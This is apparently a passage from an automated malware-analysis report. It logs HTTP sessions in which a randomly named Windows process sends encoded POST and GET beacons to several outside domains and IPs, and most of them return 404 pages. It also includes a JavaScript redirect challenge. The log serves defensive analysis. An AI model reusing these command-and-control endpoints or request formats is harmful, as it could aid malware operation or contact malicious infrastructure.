2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED] Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("f91f0b46409ca437991b00ca2f7ce4eb");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/g3h7/?2nI=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRvMsWNScFLLtPX2xNM4zETNmxHASFhTRGutFERc3E41rkQ==&knE=vl8DPVdxl&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	65518	165.154.96.210	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:50:18.297832966 CET	632	OUT	POST /t322/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 204 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.yunlekeji.top Origin: http://www.yunlekeji.top Referer: http://www.yunlekeji.top/t322/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 32 6e 49 3d 49 41 33 33 42 74 4d 4d 54 74 55 50 65 48 2f 6d 2b 57 65 79 50 64 6f 37 58 5a 6f 50 43 7a 71 43 6d 78 53 30 5a 79 76 6d 67 45 70 33 46 4b 77 6b 6a 53 4b 6e 6d 74 43 34 4f 56 2b 6c 42 79 49 35 51 53 48 31 6f 7a 49 58 2b 2f 32 61 35 6b 58 61 64 54 58 36 57 66 46 67 76 50 33 78 62 76 62 72 6c 2f 4b 65 46 34 57 6d 45 78 67 2b 43 56 43 44 48 6a 61 6e 49 59 4c 46 38 61 33 31 78 75 6c 62 52 5a 71 53 70 45 45 49 2f 6d 66 43 2f 4d 75 67 55 72 57 55 66 37 49 53 52 36 74 4d 63 36 56 62 37 56 42 54 66 74 6a 64 57 6f 52 59 54 4c 69 46 42 6b 36 6d 41 32 42 79 6a 31 5a 6b 74 6c 65 7a 78 59 6f 64 4e 61 6f 3d Data Ascii: 2nI=IA33BtMMTtUPeH/m+WeyPdo7XZoPCzqCmxS0ZyvmgEp3FKwkjSKnmtC4OV+lByI5QSH1ozIX+/2a5kXadTX6WfFgvP3xbvbrl/KeF4WmExg+CVCDHjanIYLF8a31xulbRZqSpEEI/mfC/MugUrWUf7ISR6tMc6Vb7VBTftjdWoRYTLiFBk6mA2Byj1ZktlezxYodNao=
Jan 10, 2025 22:50:19.216187000 CET	1236	IN	HTTP/1.1 404 Not Found Server: F-WEB Date: Fri, 10 Jan 2025 21:50:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 910 Connection: close FAI-W-FLOW: 1594076038 Service-Lane: e8594f12d42b28ee5775cc58b9d2e933 FAI-W-AGENT_AID: 32663896 Update-Time: 1736399500 Src-Update: true P3P: CP=CAO PSA OUR Origin-Agent-Cluster: ?0 X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block X-Download-Options: noopen X-Frame-Options: SAMEORIGIN Set-Cookie: _cliid=znNos1zabNe22zVt; domain=www.yunlekeji.top; path=/; expires=Sat, 10-Jan-2026 21:50:19 GMT; HttpOnly Set-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Sun, 12-Jan-2025 21:50:19 GMT; HttpOnly Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div>
Jan 10, 2025 22:50:19.216206074 CET	426	IN	Data Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 6f 77 75 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 73 67 22 3e 0a 09 09 09 3c 64 69 76 20 63 Data Ascii: <div class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	65519	165.154.96.210	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:50:20.845798016 CET	652	OUT	POST /t322/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 224 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.yunlekeji.top Origin: http://www.yunlekeji.top Referer: http://www.yunlekeji.top/t322/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 32 6e 49 3d 49 41 33 33 42 74 4d 4d 54 74 55 50 64 6e 50 6d 78 52 69 79 4b 39 6f 34 4a 4a 6f 50 49 54 71 47 6d 77 75 30 5a 7a 71 72 67 53 78 33 46 71 67 6b 69 54 4b 6e 68 74 43 34 64 56 2f 76 50 53 49 75 51 53 44 58 6f 32 49 58 2b 2b 57 61 35 6c 48 61 64 67 50 35 58 50 46 69 6e 76 33 33 56 50 62 72 6c 2f 4b 65 46 34 71 63 45 78 6f 2b 43 67 53 44 48 47 6d 67 4a 59 4c 45 37 61 33 31 37 4f 6b 53 52 5a 71 73 70 42 63 75 2f 6c 6e 43 2f 50 36 67 56 2b 69 58 55 37 4a 62 4a 61 73 6a 4e 37 34 2f 37 47 64 33 42 50 76 74 51 35 31 37 66 64 54 76 62 47 79 67 44 32 70 5a 6a 32 78 53 6f 53 44 62 72 37 34 74 54 4e 2b 30 31 76 6c 43 59 38 47 61 41 77 76 67 76 4a 6a 50 47 56 43 52 Data Ascii: 2nI=IA33BtMMTtUPdnPmxRiyK9o4JJoPITqGmwu0ZzqrgSx3FqgkiTKnhtC4dV/vPSIuQSDXo2IX++Wa5lHadgP5XPFinv33VPbrl/KeF4qcExo+CgSDHGmgJYLE7a317OkSRZqspBcu/lnC/P6gV+iXU7JbJasjN74/7Gd3BPvtQ517fdTvbGygD2pZj2xSoSDbr74tTN+01vlCY8GaAwvgvJjPGVCR
Jan 10, 2025 22:50:21.775463104 CET	1236	IN	HTTP/1.1 404 Not Found Server: F-WEB Date: Fri, 10 Jan 2025 21:50:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 910 Connection: close FAI-W-FLOW: 1594158038 Service-Lane: e8594f12d42b28ee5775cc58b9d2e933 FAI-W-AGENT_AID: 32663896 Update-Time: 1736399500 Src-Update: true P3P: CP=CAO PSA OUR Origin-Agent-Cluster: ?0 X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block X-Download-Options: noopen X-Frame-Options: SAMEORIGIN Set-Cookie: _cliid=oB0AaIcA2mEAtlgA; domain=www.yunlekeji.top; path=/; expires=Sat, 10-Jan-2026 21:50:21 GMT; HttpOnly Set-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Sun, 12-Jan-2025 21:50:21 GMT; HttpOnly Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div>
Jan 10, 2025 22:50:21.775485039 CET	426	IN	Data Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 6f 77 75 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 73 67 22 3e 0a 09 09 09 3c 64 69 76 20 63 Data Ascii: <div class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	65520	165.154.96.210	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:50:23.624171972 CET	1669	OUT	POST /t322/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 1240 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.yunlekeji.top Origin: http://www.yunlekeji.top Referer: http://www.yunlekeji.top/t322/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 32 6e 49 3d 49 41 33 33 42 74 4d 4d 54 74 55 50 64 6e 50 6d 78 52 69 79 4b 39 6f 34 4a 4a 6f 50 49 54 71 47 6d 77 75 30 5a 7a 71 72 67 53 35 33 46 5a 59 6b 6a 77 79 6e 67 74 43 34 47 31 2f 73 50 53 49 76 51 55 72 54 6f 32 4d 74 2b 37 53 61 2f 31 62 61 62 52 50 35 65 50 46 69 34 66 33 79 62 76 61 2f 6c 37 75 61 46 2b 4b 63 45 78 6f 2b 43 6e 71 44 41 54 61 67 45 34 4c 46 38 61 33 70 78 75 6b 36 52 5a 69 38 70 42 70 54 2f 56 48 43 2b 76 71 67 58 49 2b 58 57 62 4a 5a 63 61 73 37 4e 37 30 67 37 47 42 64 42 4f 62 55 51 2b 42 37 61 73 2b 75 42 47 79 67 52 47 5a 4b 74 55 46 76 6e 79 57 36 6a 64 34 56 57 4e 2f 61 30 50 70 55 4e 2f 75 52 4b 67 43 6c 35 66 7a 62 48 77 44 63 57 53 7a 5a 30 6e 49 78 45 34 6c 63 52 34 4f 49 48 59 64 56 58 79 63 63 54 36 37 61 51 4b 72 41 6e 51 79 50 49 6a 30 31 6a 36 76 4b 74 44 70 64 4c 73 48 51 41 56 49 70 37 6d 33 31 4a 75 31 32 7a 30 65 41 6f 79 54 76 35 30 59 63 7a 35 4f 38 46 57 51 31 70 36 4a 46 4a 56 2b 7a 6a 30 4e 52 6e 58 35 36 58 4a 6d 32 46 79 52 62 70 41 66 5a 4b 67 [TRUNCATED] Data Ascii: 2nI=IA33BtMMTtUPdnPmxRiyK9o4JJoPITqGmwu0ZzqrgS53FZYkjwyngtC4G1/sPSIvQUrTo2Mt+7Sa/1babRP5ePFi4f3ybva/l7uaF+KcExo+CnqDATagE4LF8a3pxuk6RZi8pBpT/VHC+vqgXI+XWbJZcas7N70g7GBdBObUQ+B7as+uBGygRGZKtUFvnyW6jd4VWN/a0PpUN/uRKgCl5fzbHwDcWSzZ0nIxE4lcR4OIHYdVXyccT67aQKrAnQyPIj01j6vKtDpdLsHQAVIp7m31Ju12z0eAoyTv50Ycz5O8FWQ1p6JFJV+zj0NRnX56XJm2FyRbpAfZKgeIv0mVh/bJB2NuDRd+jOCyqL6wuMTYlGiBxN2Cy1HNp4suC8BmnTCvws1xggy+f/xTDGuqm4f5WXMYIeOkVC86mqruC01xPWWuTQEf9QhTsbJtLiIf7ZaDkW/yINlD28OuzwxAvsVQKBVdlHAg5UGUbfr+EiEN2Zrk8Nstvpde4lUeBtRr2Iva/rAfyilJlbS2oShRdZkOUb3946TbpR+5RzyUetqoPSnLp7UttKHeRca3X+UTQzCOoIcaB+vW6wsVqiGt8Vx0X7b1Cy4geKeerRr81XygcEj/9SKUuhWkU8uyVFMyN0FEu+kEVEl/e1MJfYZjgSxpB3lwNg8vu9/mNVrsNEKxYVPzHML6o5ZJ//ouBvGo1Bu2l61GfBliMl4FfvujfOkpoE1Wpb/0MPWBmyqSLnYua/JbtTMbEtmm0eRqs3J+hPwMf03EcC+SAjgMP/aZw3VfgJ7uqJAO3PNPuzf6K30Q5YScmatITyMyrTmPc+gRiNu/GFfMh6q0zbOpxVgcTmnbgnM+gBoUePMXQH4qgl2oO8c6MkxycQjnOqnYAMHlFYUuu1LJ6We1m3B8Ez/UNwaB3SjOBs6KnDTMBwyq3vFbHZGaN+/D0O6IRu/I/0/OKJJWFM3X60Sb0Oq+2zp7Gjz+yG5IiPbFlCdTFwuLxs4I6Wq5 [TRUNCATED]
Jan 10, 2025 22:50:24.511892080 CET	1236	IN	HTTP/1.1 404 Not Found Server: F-WEB Date: Fri, 10 Jan 2025 21:50:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 910 Connection: close FAI-W-FLOW: 1594240038 Service-Lane: e8594f12d42b28ee5775cc58b9d2e933 FAI-W-AGENT_AID: 32663896 Update-Time: 1736399500 Src-Update: true P3P: CP=CAO PSA OUR Origin-Agent-Cluster: ?0 X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block X-Download-Options: noopen X-Frame-Options: SAMEORIGIN Set-Cookie: _cliid=vAEh7wCIuwBiLsCY; domain=www.yunlekeji.top; path=/; expires=Sat, 10-Jan-2026 21:50:24 GMT; HttpOnly Set-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Sun, 12-Jan-2025 21:50:24 GMT; HttpOnly Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div>
Jan 10, 2025 22:50:24.511940002 CET	426	IN	Data Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 6f 77 75 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 73 67 22 3e 0a 09 09 09 3c 64 69 76 20 63 Data Ascii: <div class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	65521	165.154.96.210	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:50:26.419190884 CET	371	OUT	GET /t322/?2nI=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XR8V86LXkcIGT0dmKE8rYJBtcLljpCBGaC+nO46fC9uxVPg==&knE=vl8DPVdxl HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.yunlekeji.top User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 10, 2025 22:50:27.296711922 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Connection: close Date: Fri, 10 Jan 2025 21:50:25 GMT Content-Length: 910 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Download-Options: noopen X-XSS-Protection: 1; mode=block Cache-Flow: 7580625823 Origin-Agent-Cluster: ?0 FAI-W-FLOW: 1594326038 FAI-W-AGENT-AID: 32663896 Service-Lane: e8594f12d42b28ee5775cc58b9d2e933 P3P: CP=CAO PSA OUR X-Permitted-Cross-Domain-Policies: none Server: F-WEB Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div> <div class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="back" style="margi
Jan 10, 2025 22:50:27.296727896 CET	166	IN	Data Raw: 6e 2d 6c 65 66 74 3a 20 30 70 78 3b 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 61 63 6b 54 78 74 22 3e e8 bf 94 e5 9b 9e e9 Data Ascii: n-left: 0px;"><div class="backImg"></div><span class="backTxt"></span></div></a></div></div> </div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	65522	45.141.156.114	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:50:32.342902899 CET	629	OUT	POST /iuvu/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 204 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.logidant.xyz Origin: http://www.logidant.xyz Referer: http://www.logidant.xyz/iuvu/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 32 6e 49 3d 31 45 36 43 37 35 54 5a 70 4a 4e 45 53 37 79 78 4d 4b 56 72 49 48 54 44 44 32 46 41 51 57 75 57 47 2f 63 4c 7a 78 58 6d 50 68 74 56 46 6e 67 58 31 51 54 68 4e 35 45 49 53 63 66 75 4a 45 2b 30 52 67 66 74 61 6a 43 39 68 39 4a 75 30 74 6c 34 76 73 47 4a 52 56 62 39 2f 56 53 53 2b 34 48 41 6e 35 77 6a 62 36 74 76 42 4a 6a 59 2b 75 77 4d 54 77 68 58 73 77 35 34 47 2b 47 7a 37 45 79 7a 32 69 75 4a 62 31 6a 70 42 42 64 6c 57 50 4a 65 74 71 53 36 53 73 34 68 74 5a 55 6f 39 66 69 69 33 42 43 46 56 41 62 61 56 7a 4d 77 55 55 67 6f 7a 32 74 74 74 32 7a 32 35 53 35 33 32 51 62 39 6b 4c 47 42 56 48 45 3d Data Ascii: 2nI=1E6C75TZpJNES7yxMKVrIHTDD2FAQWuWG/cLzxXmPhtVFngX1QThN5EIScfuJE+0RgftajC9h9Ju0tl4vsGJRVb9/VSS+4HAn5wjb6tvBJjY+uwMTwhXsw54G+Gz7Eyz2iuJb1jpBBdlWPJetqS6Ss4htZUo9fii3BCFVAbaVzMwUUgoz2ttt2z25S532Qb9kLGBVHE=
Jan 10, 2025 22:50:33.040553093 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 21:50:32 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
